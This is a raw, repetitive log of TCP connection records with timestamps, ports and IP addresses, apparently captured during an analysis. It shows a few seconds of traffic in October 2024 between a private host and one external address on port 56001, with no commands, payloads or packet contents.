Oct 13, 2024 18:16:31.168343067 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168422937 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168436050 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168453932 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168472052 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168484926 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168498993 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168507099 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168514967 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168526888 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168529034 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168550968 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168565989 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168587923 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168587923 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168642044 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168654919 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168668032 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168683052 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168715000 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168715000 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168797016 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168812037 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168826103 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168847084 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168863058 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168875933 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168879032 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168889999 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168910980 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168920994 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168926001 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.168937922 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.168987036 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.495001078 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.495014906 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.495217085 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.495408058 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.495474100 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.511964083 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.519165993 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.521653891 CEST	49732	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.526623964 CEST	56001	49732	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.864922047 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.869812012 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.869869947 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.871125937 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.875940084 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:31.875983000 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:31.880819082 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:32.578926086 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:32.579498053 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:32.584332943 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:32.616600037 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:32.621468067 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:32.621609926 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:32.626446962 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.053324938 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084260941 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084275961 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084290981 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084301949 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.084322929 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.084342003 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084357977 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084371090 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084391117 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.084402084 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084420919 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084434032 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.084445953 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084460974 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.084481955 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.089281082 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.089317083 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.089359045 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.143754005 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.172168016 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.211422920 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.211438894 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.211462021 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.211477041 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.211512089 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.211535931 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.211550951 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.211600065 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.211697102 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.211715937 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.211730957 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.211745024 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.212059021 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.212079048 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.212093115 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.212101936 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.212135077 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.212476015 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.212512970 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.212554932 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.212568045 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.212599993 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.212614059 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.212634087 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.213363886 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.213386059 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.213402033 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.213412046 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.213463068 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.213485003 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.213502884 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.213534117 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.216406107 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.216418982 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.216439962 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.216470957 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.299530029 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.299556971 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.299613953 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.338846922 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.338954926 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.338967085 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.338982105 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.338996887 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.339005947 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339015961 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.339035988 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339050055 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339062929 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339071989 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.339086056 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339093924 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.339318991 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339363098 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.339409113 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339422941 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339443922 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339454889 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.339471102 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339483976 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339524031 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.339754105 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339791059 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.339822054 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339835882 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339860916 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.339931011 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339943886 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339957952 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.339979887 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.340256929 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340270042 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340291023 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340297937 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.340316057 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340329885 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.340338945 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340383053 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.340431929 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340445042 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340457916 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340468884 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.340481043 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340495110 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340511084 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.340610981 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340631008 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.340652943 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.341180086 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341192961 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341207027 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341218948 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.341231108 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341239929 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.341260910 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341283083 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341290951 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.341305017 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341345072 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.341387987 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341402054 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341414928 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341428041 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341442108 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.341455936 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.341476917 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.342071056 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.342116117 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.387998104 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.388039112 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.388052940 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.388092995 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.388145924 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.388158083 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.388194084 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.466308117 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466353893 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466367960 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466387987 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.466420889 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466434002 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466448069 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466459990 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.466485023 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466492891 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.466519117 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466552019 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.466579914 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466643095 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466700077 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.466708899 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466722012 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466736078 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466753960 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466759920 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.466800928 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.466869116 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466888905 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466902018 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466916084 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.466928959 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.466959000 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.467178106 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467200994 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467215061 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467235088 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.467324018 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467349052 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467361927 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.467370987 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467408895 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.467438936 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467458010 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467490911 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.467580080 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467626095 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467639923 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467660904 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.467689037 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467708111 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467721939 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467730999 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.467745066 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467755079 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.467807055 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467828989 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.467859030 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.468158007 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468172073 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468188047 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468197107 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.468215942 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.468271017 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468283892 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468303919 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468319893 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.468327045 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468377113 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.468447924 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468470097 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468482971 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468502998 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468521118 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468527079 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.468539953 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.468548059 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468560934 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468578100 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.468590021 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468605042 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.468640089 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.469152927 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469175100 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469191074 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.469204903 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469218016 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469296932 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.469316006 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469330072 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469342947 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469361067 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.469368935 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469381094 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.469394922 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469423056 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.469527006 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469541073 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469553947 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469572067 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.469578981 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469593048 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469608068 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.469618082 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.469638109 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.469652891 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.470026016 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.470066071 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.470103025 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.470114946 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.470129013 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.470149994 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.470216036 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.470228910 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.470243931 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.470253944 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.470266104 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.470276117 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.477154016 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.477200985 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.477233887 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.477250099 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.477279902 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.477361917 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.477375984 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.477397919 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.477408886 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.477421999 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.477442980 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.477458000 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.477464914 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.477524996 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.554586887 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554600954 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554615021 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554629087 CEST	56001	55236	31.41.244.211	192.168.2.4
Oct 13, 2024 18:16:34.554692030 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.554692030 CEST	55236	56001	192.168.2.4	31.41.244.211
Oct 13, 2024 18:16:34.554716110 CEST	56001	55236	31.41.244.211	192.168.2.4
